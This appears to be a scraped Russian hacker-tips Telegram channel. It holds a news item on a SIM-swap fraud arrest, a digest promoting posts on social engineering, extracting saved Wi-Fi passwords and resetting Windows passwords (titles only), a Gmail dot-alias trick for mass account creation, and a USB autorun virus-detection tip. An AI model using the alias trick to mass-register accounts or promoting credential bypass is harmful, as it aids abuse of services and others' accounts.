Для хищения денег использовался sim-свопинг - вид мошенничества, при котором преступник, узнав номер телефона жертвы, перевыпускает ее сим-карту, чтобы получить полный доступ к банковскому счету.
Операция проводилась в различных регионах страны, задержаны 94 человека, которым могут быть предъявлены обвинения в мошенничестве, отмывании денег, членстве в преступной группировке, подделке документов. Сумма похищенного составляет 504,8 тысячи евро, у одной из жертв с банковского счета были украдены 240 тысяч.
Вот это я понимаю реальная дырка в системе. Симка - это доступ ко всем ресурсам и аккаунтам пользователя, но при этом ее защита нулевая.
Почему в 2020 году люди нанимают дропов за 1 тыс рублей, в фотошопе рисуют доки и бегут перевыпускать симкарты?
Уважаемые сотовые операторы, остановите это безумие, плиз.
То что ты хотел, но забыл прочитать
Приветствую читателей Cmd!
Сегодня решил сделать подборку наших постов, которые вы должны обязательно прочитать и попробовать применить.
Знаю, что у меня очень активная аудитория и все мои посты вы охотно читаете, поэтому это подборка больше для наших новичков
1. Прокачка навыков СИ до уровня БОГ
2. Как найти пароли всех подключенных сетей Wi-Fi с помощью Cmd
3. Прячем файлы в картинке через Cmd
4. Пробуем скрытые возможности Смартфона
5. Сбрасываем или меняем пароль Windows, не зная предыдущего
‼Не забудь подписаться, дальше будет интереснее.‼
Приветствую читателей Cmd!
Сегодня решил сделать подборку наших постов, которые вы должны обязательно прочитать и попробовать применить.
Знаю, что у меня очень активная аудитория и все мои посты вы охотно читаете, поэтому это подборка больше для наших новичков
1. Прокачка навыков СИ до уровня БОГ
2. Как найти пароли всех подключенных сетей Wi-Fi с помощью Cmd
3. Прячем файлы в картинке через Cmd
4. Пробуем скрытые возможности Смартфона
5. Сбрасываем или меняем пароль Windows, не зная предыдущего
‼Не забудь подписаться, дальше будет интереснее.‼
❤1
This media is not supported in your browser
VIEW IN TELEGRAM
Создаем тысячи Gmail почт за 5 секунд
Приветствую читателей Cmd
Думаю многие знают про фичу Gmail, которая позволяет регистрировать тысячи аккаунтов имея всего одну почту.
Или же вам нужно просто зарегистрировать аккаунт на сайте, но создавать новый ящик желания нет.
Что же эта за фича такая? Дело в том, что точка является уникальным символом в почтовом адресе,т.е.
cmdtelegram@gmail.com и cmd.telegram@gmail.com являются разным емейлами,
но гугл и различные сайты почему то так не считают и если мы отправим сообщение на cmd.telegram@gmail.com,
оно будет переадресовано cmdtelegram, то есть гугл не учитывает точку как уникальный символ и переадресовывает сообщение на email без точки.
Но самому создавать тысячи уникальных символов для почт трудновато, поэтому можно воспользоваться сайтом thebot.net
Чем больше символов в вашем email, тем больше можно создать псевдопочт. Также все это дело можно сохранить и оптимизировать под себя.
https://thebot.net/api/gmail/
Приветствую читателей Cmd
Думаю многие знают про фичу Gmail, которая позволяет регистрировать тысячи аккаунтов имея всего одну почту.
Или же вам нужно просто зарегистрировать аккаунт на сайте, но создавать новый ящик желания нет.
Что же эта за фича такая? Дело в том, что точка является уникальным символом в почтовом адресе,т.е.
cmdtelegram@gmail.com и cmd.telegram@gmail.com являются разным емейлами,
но гугл и различные сайты почему то так не считают и если мы отправим сообщение на cmd.telegram@gmail.com,
оно будет переадресовано cmdtelegram, то есть гугл не учитывает точку как уникальный символ и переадресовывает сообщение на email без точки.
Но самому создавать тысячи уникальных символов для почт трудновато, поэтому можно воспользоваться сайтом thebot.net
Чем больше символов в вашем email, тем больше можно создать псевдопочт. Также все это дело можно сохранить и оптимизировать под себя.
https://thebot.net/api/gmail/
This media is not supported in your browser
VIEW IN TELEGRAM
План капкан. Узнаем есть ли вирус на флешке
Бывает ситуация, когда приходится вставлять свою флешку в чужой компьютер. Это совсем не обязательно компьютер друзей-приятелей, сейчас можно подцепить вирус и в студии фотопечати, и даже в налоговой.
Суть метода заключается в создании иконки для флешки со специальным файлом. Если на флешку попадет вирус то он перепишет файл и наша иконка пропадет, тем самым мы поймем,что поймали вирус.
1. Создаем на флешке текстовый документ, затем переименовываем его в autorun.inf.
2. Далее находим иконку в интернете или создаем свою с размером 64х64. Скачать можно тут, сделать иконку тут
3. Открываем файл autorun.inf через блокнот и пишем:
[autorun]
icon=1.ico
где вместо "1" должно быть написано имя выбранной вами иконки. Сохраняем и закрываем autorun.inf
4. Теперь копируем иконку на флешку
5. Закрываем флешку, вытаскиваем и вставляем обратно.
Если на вашу флешку попадет вирус, то он перепишет autorun.inf и ваша иконка не будет отображаться - это и будет признаком вируса
Бывает ситуация, когда приходится вставлять свою флешку в чужой компьютер. Это совсем не обязательно компьютер друзей-приятелей, сейчас можно подцепить вирус и в студии фотопечати, и даже в налоговой.
Суть метода заключается в создании иконки для флешки со специальным файлом. Если на флешку попадет вирус то он перепишет файл и наша иконка пропадет, тем самым мы поймем,что поймали вирус.
1. Создаем на флешке текстовый документ, затем переименовываем его в autorun.inf.
2. Далее находим иконку в интернете или создаем свою с размером 64х64. Скачать можно тут, сделать иконку тут
3. Открываем файл autorun.inf через блокнот и пишем:
[autorun]
icon=1.ico
где вместо "1" должно быть написано имя выбранной вами иконки. Сохраняем и закрываем autorun.inf
4. Теперь копируем иконку на флешку
5. Закрываем флешку, вытаскиваем и вставляем обратно.
Если на вашу флешку попадет вирус, то он перепишет autorun.inf и ваша иконка не будет отображаться - это и будет признаком вируса
👍3